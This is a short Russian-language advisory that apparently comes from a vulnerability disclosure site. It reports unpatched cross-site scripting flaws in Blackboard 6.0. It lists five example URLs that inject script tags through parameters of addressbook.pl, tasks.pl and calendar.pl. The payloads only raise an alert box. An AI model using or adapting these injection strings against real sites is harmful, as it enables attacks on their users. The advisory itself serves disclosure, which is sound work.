Security Lab

Межайтовый скриптинг в Blackboard

Дата публикации:14.04.2004
Всего просмотров:1158
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Blackboard Learning and Community Portal Systems 6
Уязвимые версии: Blackboard 6.0

Описание: Несколько уязвимостей обнаружено в Blackboard. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[victim]/bin/common/addressbook.pl?action=ADD&nav=my_addressbook&course='%3E%3Cscript%3Ealert('Vulnera ble')%3C/script%3E

http://[victim]/bin/common/tasks.pl?action=c&display=T.subject&filter=--!!all&course_id=&render_type='%3E%3Cscript%3Ealert('Vulnerable')%3C/

http ://[victim]/bin/common/calendar.pl?course_name=%22%3E%3Cscript%3Ealert('Vulnerable')%3C/script%3E

http://[victim]/bin/common/calendar.pl?courseID=%22%3E%3Cscript%3Eale rt('Vulnerable')%3C/script%3E

http://[victim]/bin/common/calendar.pl?subroutine=%22%3E%3Cscript%3Ealert('Vulnerable')%3C/script%3E

URL производителя: http://www.blackboard.com/products/ps/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.